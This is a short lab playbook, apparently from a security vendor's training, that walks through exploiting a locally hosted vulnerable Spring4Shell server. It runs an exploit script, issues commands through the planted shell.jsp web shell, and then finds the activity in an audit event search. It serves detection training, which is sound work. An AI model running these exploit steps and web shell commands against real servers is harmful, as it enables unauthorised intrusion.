Threat Stack Playbooks

Spring4Shell Playbook

First, Access the Linux Ubuntu 20.04 LTS Box via WebShell.

../_images/UbuntuWebshell.png

Next, navigate to the /spring4shell/ directory found in root by entering the following command:

cd /spring4shell/
../_images/CDDirectoryCommand.png

Next, to spin up the vulnerable Spring server, run the following command:

docker run -p 80:8080 spring4shell

after you run the command, you should see the following screen.

../_images/Spring4ShellScreen.png

Go back to UDF and open another shell connection the linux host again. Then run the following command

curl localhost: curl localhost/helloworld/greeting

The following output should manifest.

../_images/CurlOutput.png

Now to exploit, run the following command in the spring4shell directory. Navigate to the spring4shell directory by running the following commands.

cd /spring4shell/
python3 exploit.py --url 'http://localhost/helloworld/greeting'

The following output should manifest.

../_images/CurlOutput2.png

Now run the following command via shell

curl http://localhost/shell.jsp?cmd=pwd --output -

Note

Run the –output flag as this is required for the output to display

then run:

touch yougotpwndStudentN.txt

If you navigate to event search and enter the following query and event search, you will see your command.

event_type = "audit" and command = "touch"
../_images/pwned2.gif